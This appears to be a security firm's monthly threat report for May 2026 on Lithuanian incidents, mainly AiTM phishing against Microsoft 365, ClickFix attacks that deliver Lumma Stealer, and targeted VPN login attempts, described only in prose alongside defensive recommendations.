
May 2026 was clearly dominated by identity and credential theft. Phishing campaigns were, as is most often the case, aimed at Microsoft 365 and other email accounts, while the most advanced ones bypass two-factor authentication (AiTM) in real time. Six out of ten events we logged in May were tied specifically to credential harvesting or session hijacking. That same month, Lithuania was shaken by a large-scale leak from state registers, which likewise appears to have been breached using legitimate login credentials seized by threat actors. This best illustrates the month’s key message: today attackers do not “break down the door” – they log in with someone else’s keys.
Phishing and AiTM: MFA alone is no longer enough
Most of May’s events were phishing emails leading to credential-harvesting pages, most often imitating the Microsoft 365 sign-in. Several campaigns used the AiTM (adversary-in-the-middle) technique: once the victim signs in, the attacker proxies the communication in real time and steals the session token, thereby bypassing even enabled MFA.
We also observed companies’ brands impersonation: we recorded attempts to impersonate an internet service provider in order to deliver fake invoices and defraud victims, as well as imitation of a bank’s login page via a compromised foreign domain, targeting Lithuanian users. Attackers increasingly hide behind legitimate cloud services (e.g., Cloudflare Workers) and redirect chains, which makes such emails harder to filter. The trend is not local: over the past year AiTM attacks have grown by roughly 146% worldwide, and in March Europol took down the major phishing-as-a-service platform Tycoon 2FA. The conclusion is simple – MFA is essential, but it is not enough: phishing-resistant MFA must be deployed, and session token usage anomalies that may indicate token theft must be monitored.
ClickFix – “Lumma Stealer”
ClickFix attacks, which dominated in previous months, remained active in May. The victim is shown a fake CAPTCHA or “error” page urging them to “verify” or “fix” access by pasting a command into the Windows Run dialog. This launches a PowerShell command that loads the Lumma Stealer infostealer directly into memory, leaving no files on disk. In May we recorded two such ClickFix Lumma cases. Because the malicious code runs in memory, signature-based defenses struggle to detect it – behavioral analysis is essential.
Targeted attacks against Lithuanian targets
Alongside mass phishing, we also saw targeted intrusion attempts. We recorded SSL/VPN login attempts using a list of Lithuanian usernames, which indicates that the attackers had gathered information about a specific organization in advance. We also observed automated scanning of publicly accessible systems and attempts to exploit vulnerabilities (e.g., SSRF), as well as malware distribution through forged installers and CDNs (e.g., a trojanized JDownloader, the DriverHub PUA). Different methods, but the common denominator is the same – initial access through a human or through an unprotected public-facing service.
Stolen legitimate credentials remain one of the principal intrusion vectors. MFA is essential, yet AiTM bypasses it, so phishing-resistant MFA, monitoring of session-token reuse, and detection of unusual logins are all needed.
Phishing emails increasingly arrive from legitimate but compromised mailboxes or trusted domains and hide behind cloud services that traditional email filters do not flag. ClickFix and infostealer-type malware run in memory, fileless, so signature-based defenses do not catch them – behavioral and contextual analysis, together with continuous user training, are required.
Looking ahead
Organizations should focus on:
Sources
https://www.nksc.lt/naujienos/nacionaline_kibernetinio_saugumo_bukles_ataskaita_.html
https://www.elastic.co/security-labs/tycoon-2fa-aitm-detection-engineering
https://thehackernews.com/2026/05/microsoft-details-phishing-campaign.html